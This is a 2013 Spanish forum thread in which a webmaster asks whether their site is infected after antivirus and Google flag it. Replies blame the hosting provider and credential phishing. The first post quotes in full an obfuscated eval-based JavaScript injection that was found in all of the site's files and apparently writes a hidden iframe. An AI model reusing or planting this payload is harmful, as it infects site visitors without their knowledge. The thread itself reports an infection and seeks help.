Foros del Web » Programando para Internet » PHP »

[SOLUCIONADO] ¿Mi sitio web esta infectado?

Estas en el tema de ¿Mi sitio web esta infectado? en el foro de PHP en Foros del Web. Ya me había dado cuenta, este código había aparecido de la nada en un sitio HTML, así que solo lo re-edite y lo re-subi. Hasta ...
  #1 (permalink)  
Antiguo 24/05/2013, 08:34
 
Fecha de Ingreso: julio-2012
Ubicación: Ciudad de México
Mensajes: 44
Antigüedad: 11 años, 9 meses
Puntos: 2
Exclamación ¿Mi sitio web esta infectado?

Ya me había dado cuenta, este código había aparecido de la nada en un sitio HTML, así que solo lo re-edite y lo re-subi.

Hasta hoy no había problemas, hasta que lo volví a encontrar esta vez en algo más importante: Piwik.

Todo comenzó hoy en la mañana cuando abri Piwik para ver las visitas de mis sitios web cuando de pronto el ESET me marcaba una amenaza en mi propio sitio web. Como no me dejaba entrar al sitio lo desactive pero luego fué Google quien me alerto.

Reviso el código fuente del sitio web y me encuentro esto en todos los archivos:
Cita:
<script type="text/javascript" language="javascript" > e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}i f(!a){try{document["bod"+z]--}catch(q){a2="_";sa=7;}z="27_6d_7c_75_6a_7b_70_76_ 75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68 _79_27_69_75_78_27_44_27_6b_76_6a_7c_74_6c_75_7b_3 5_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_ 6d_79_68_74_6c_2e_30_42_14_11_14_11_27_69_75_78_35 _7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_74_80_7 2_69_70_78_76_72_35_7c_7a_36_6a_76_7c_75_7b_39_39_ 35_77_6f_77_2e_42_14_11_27_69_75_78_35_7a_7b_80_73 _6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7 a_76_73_7c_7b_6c_2e_42_14_11_27_69_75_78_35_7a_7b_ 80_73_6c_35_69_76_79_6b_6c_79_27_44_27_2e_37_2e_42 _14_11_27_69_75_78_35_7a_7b_80_73_6c_35_6f_6c_70_6 e_6f_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_69_75_ 78_35_7a_7b_80_73_6c_35_7e_70_6b_7b_6f_27_44_27_2e _38_77_7f_2e_42_14_11_27_69_75_78_35_7a_7b_80_73_6 c_35_73_6c_6d_7b_27_44_27_2e_38_77_7f_2e_42_14_11_ 27_69_75_78_35_7a_7b_80_73_6c_35_7b_76_77_27_44_27 _2e_38_77_7f_2e_42_14_11_14_11_27_70_6d_27_2f_28_6 b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_ 75_7b_49_80_50_6b_2f_2e_69_75_78_2e_30_30_27_82_14 _11_27_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2 f_2e_43_6b_70_7d_27_70_6b_44_63_2e_69_75_78_63_2e_ 45_43_36_6b_70_7d_45_2e_30_42_14_11_27_6b_76_6a_7c _74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_8 0_50_6b_2f_2e_69_75_78_2e_30_35_68_77_77_6c_75_6b_ 4a_6f_70_73_6b_2f_69_75_78_30_42_14_11_27_84_14_11 _84_14_11_6d_7c_75_6a_7b_70_76_75_27_5a_6c_7b_4a_7 6_76_72_70_6c_2f_6a_76_76_72_70_6c_55_68_74_6c_33_ 6a_76_76_72_70_6c_5d_68_73_7c_6c_33_75_4b_68_80_7a _33_77_68_7b_6f_30_27_82_14_11_27_7d_68_79_27_7b_7 6_6b_68_80_27_44_27_75_6c_7e_27_4b_68_7b_6c_2f_30_ 42_14_11_27_7d_68_79_27_6c_7f_77_70_79_6c_27_44_27 _75_6c_7e_27_4b_68_7b_6c_2f_30_42_14_11_27_70_6d_2 7_2f_75_4b_68_80_7a_44_44_75_7c_73_73_27_83_83_27_ 75_4b_68_80_7a_44_44_37_30_27_75_4b_68_80_7a_44_38 _42_14_11_27_6c_7f_77_70_79_6c_35_7a_6c_7b_5b_70_7 4_6c_2f_7b_76_6b_68_80_35_6e_6c_7b_5b_70_74_6c_2f_ 30_27_32_27_3a_3d_37_37_37_37_37_31_39_3b_31_75_4b _68_80_7a_30_42_14_11_27_6b_76_6a_7c_74_6c_75_7b_3 5_6a_76_76_72_70_6c_27_44_27_6a_76_76_72_70_6c_55_ 68_74_6c_32_29_44_29_32_6c_7a_6a_68_77_6c_2f_6a_76 _76_72_70_6c_5d_68_73_7c_6c_30_14_11_27_32_27_29_4 2_6c_7f_77_70_79_6c_7a_44_29_27_32_27_6c_7f_77_70_ 79_6c_35_7b_76_4e_54_5b_5a_7b_79_70_75_6e_2f_30_27 _32_27_2f_2f_77_68_7b_6f_30_27_46_27_29_42_27_77_6 8_7b_6f_44_29_27_32_27_77_68_7b_6f_27_41_27_29_29_ 30_42_14_11_84_14_11_6d_7c_75_6a_7b_70_76_75_27_4e _6c_7b_4a_76_76_72_70_6c_2f_27_75_68_74_6c_27_30_2 7_82_14_11_27_7d_68_79_27_7a_7b_68_79_7b_27_44_27_ 6b_76_6a_7c_74_6c_75_7b_35_6a_76_76_72_70_6c_35_70 _75_6b_6c_7f_56_6d_2f_27_75_68_74_6c_27_32_27_29_4 4_29_27_30_42_14_11_27_7d_68_79_27_73_6c_75_27_44_ 27_7a_7b_68_79_7b_27_32_27_75_68_74_6c_35_73_6c_75 _6e_7b_6f_27_32_27_38_42_14_11_27_70_6d_27_2f_27_2 f_27_28_7a_7b_68_79_7b_27_30_27_2d_2d_14_11_27_2f_ 27_75_68_74_6c_27_28_44_27_6b_76_6a_7c_74_6c_75_7b _35_6a_76_76_72_70_6c_35_7a_7c_69_7a_7b_79_70_75_6 e_2f_27_37_33_27_75_68_74_6c_35_73_6c_75_6e_7b_6f_ 27_30_27_30_27_30_14_11_27_82_14_11_27_79_6c_7b_7c _79_75_27_75_7c_73_73_42_14_11_27_84_14_11_27_70_6 d_27_2f_27_7a_7b_68_79_7b_27_44_44_27_34_38_27_30_ 27_79_6c_7b_7c_79_75_27_75_7c_73_73_42_14_11_27_7d _68_79_27_6c_75_6b_27_44_27_6b_76_6a_7c_74_6c_75_7 b_35_6a_76_76_72_70_6c_35_70_75_6b_6c_7f_56_6d_2f_ 27_29_42_29_33_27_73_6c_75_27_30_42_14_11_27_70_6d _27_2f_27_6c_75_6b_27_44_44_27_34_38_27_30_27_6c_7 5_6b_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_76_76_ 72_70_6c_35_73_6c_75_6e_7b_6f_42_14_11_27_79_6c_7b _7c_79_75_27_7c_75_6c_7a_6a_68_77_6c_2f_27_6b_76_6 a_7c_74_6c_75_7b_35_6a_76_76_72_70_6c_35_7a_7c_69_ 7a_7b_79_70_75_6e_2f_27_73_6c_75_33_27_6c_75_6b_27 _30_27_30_42_14_11_84_14_11_70_6d_27_2f_75_68_7d_7 0_6e_68_7b_76_79_35_6a_76_76_72_70_6c_4c_75_68_69_ 73_6c_6b_30_14_11_82_14_11_70_6d_2f_4e_6c_7b_4a_76 _76_72_70_6c_2f_2e_7d_70_7a_70_7b_6c_6b_66_7c_78_2 e_30_44_44_3c_3c_30_82_84_6c_73_7a_6c_82_5a_6c_7b_ 4a_76_76_72_70_6c_2f_2e_7d_70_7a_70_7b_6c_6b_66_7c _78_2e_33_27_2e_3c_3c_2e_33_27_2e_38_2e_33_27_2e_3 6_2e_30_42_14_11_14_11_81_81_81_6d_6d_6d_2f_30_42_ 14_11_84_14_11_84_14_11"["split"](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}</script>
Yo no reconozco que es este código, entonces supuse que es la amenaza. No sé como combatirla pues esta en todo el servidor.
__________________
Sígueme en Twitter: @SamyCanales
  #2 (permalink)  
Antiguo 24/05/2013, 09:24
Avatar de Rafael
Modegráfico
 
Fecha de Ingreso: marzo-2003
Mensajes: 9.028
Antigüedad: 21 años, 1 mes
Puntos: 1826
Respuesta: ¿Mi sitio web esta infectado?

Tu proveedor de hosting debería tener una seguridad mínima. Su servidor es el que está infectado. Y más vale que lo solucione pronto, así que contáctalo y exígele que lo arregle.

Si no lo solucionan ya, más te vale cambiarte.

He visto páginas infectadas hasta en los proveedores grandes de hosting, específicamente el que pagas con tu recibo de teléfono. Leo tu ubicación y tal vez va por ahí.
  #3 (permalink)  
Antiguo 24/05/2013, 10:33
 
Fecha de Ingreso: julio-2012
Ubicación: Ciudad de México
Mensajes: 44
Antigüedad: 11 años, 9 meses
Puntos: 2
Respuesta: ¿Mi sitio web esta infectado?

Yo sabía que no era yo :)

Pues me cambiare de proveedor, de todos modos ya empezaba a necesitar un VPS. Gracias por la respuesta.
__________________
Sígueme en Twitter: @SamyCanales
  #4 (permalink)  
Antiguo 24/05/2013, 11:06
 
Fecha de Ingreso: abril-2003
Ubicación: Mexico
Mensajes: 604
Antigüedad: 21 años
Puntos: 23
Respuesta: ¿Mi sitio web esta infectado?

buenas..
pues muchas veces no solo es el proveedor, tengo clientes que les llega una supuesta oferta de parte mia que proporcione su usuario y contraseña para que tenga una extension o promosion ...
al final todo es falso.. pero mientras ya fuiste victimado... una vez dentro suben archivos con capacidad para tomar el control no solo de la cuenta, si no te todo el servidor...
y no hay mucho que hacer... porque supuestamente es el "mismo cliente" quien lo esta subiendo... cuando realmente es otra persona con intenciones no muy sanas
bueno.. es mi experiencia.. y mi consejo seria que valores el precio-calidad, si pagas algo muy barato no puedes esperar grandes cosas aunque te las ofrezcan....

saludos!!
__________________
¡El Respeto al Derecho Ajeno Es la Paz!

Etiquetas: html
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 14:30.